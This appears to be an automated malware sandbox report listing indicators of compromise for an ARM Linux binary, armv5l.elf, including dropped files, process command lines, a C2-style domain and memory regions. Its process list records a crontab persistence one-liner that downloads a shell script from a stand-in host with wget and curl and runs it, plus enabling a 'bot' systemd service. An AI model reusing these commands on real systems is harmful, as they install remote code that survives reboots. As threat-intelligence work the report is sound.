IOC Report
armv5l.elf

loading gif

Files

File Path
Type
Category
Malicious
armv5l.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
malicious
/root/.bashrc
ASCII text
dropped
malicious
/var/spool/cron/crontabs/tmp.bn3aJA
ASCII text
dropped
malicious
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/usr/lib/systemd/system/bot.service
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/armv5l.elf
/tmp/armv5l.elf
/tmp/armv5l.elf
-
/tmp/armv5l.elf
-
/tmp/armv5l.elf
-
/tmp/armv5l.elf
-
/tmp/armv5l.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/bin/sh
-
/usr/bin/sh
sh bins.sh
/bin/sh
-
/bin/curl
/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/usr/bin/sh
sh bins.sh
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/armv5l.elf
-
/bin/sh
sh -c "/bin/systemctl enable bot"
/bin/sh
-
/bin/systemctl
/bin/systemctl enable bot
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 17 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://serverip/bins/bins.sh
unknown
http://serverip/bins/bins.sh;
unknown

Domains

Name
IP
Malicious
ch.archive.ubuntu.com
unknown
host.zopz-api.com
unknown

IPs

IP
Domain
Country
Malicious
185.125.190.26
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
557a4d59f000
page read and write
557a4f5b4000
page read and write
7f07eb120000
page read and write
7f06e4028000
page execute read
7f07e4021000
page read and write
7f06e4031000
page read and write
7fff5ab87000
page read and write
7f07eb804000
page read and write
7f06e4038000
page read and write
557a4d345000
page execute read
7fff5abab000
page execute read
7f07eaac1000
page read and write
7f06e4031000
page read and write
557a4d596000
page read and write
7f07eb672000
page read and write
7f06e4028000
page execute read
557a510c5000
page read and write
7f07eb491000
page read and write
7f07eb143000
page read and write
557a4f59d000
page execute and read and write
7f07e3fff000
page read and write
7f07eb491000
page read and write
7f07eaeb5000
page read and write
557a4d345000
page execute read
557a4f59d000
page execute and read and write
7f07eb804000
page read and write
7f06e4038000
page read and write
7f07eb79b000
page read and write
7f07eb2af000
page read and write
7f07eab53000
page read and write
7f07eaeb5000
page read and write
7f07eb79b000
page read and write
7f07eb2af000
page read and write
7f07ea2b9000
page read and write
557a4d59f000
page read and write
7fff5ab87000
page read and write
7f07eab53000
page read and write
7f07e4021000
page read and write
7fff5abab000
page execute read
7f06e403a000
page read and write
7f07e3fff000
page read and write
557a510c5000
page read and write
7f07eb143000
page read and write
557a4d596000
page read and write
7f07eb672000
page read and write
7f07ea2b9000
page read and write
557a510e5000
page read and write
7f07eb7bf000
page read and write
7f07eb120000
page read and write
557a4f5b4000
page read and write
7f07eb7bf000
page read and write
7f07eaac1000
page read and write
There are 42 hidden memdumps, click here to show them.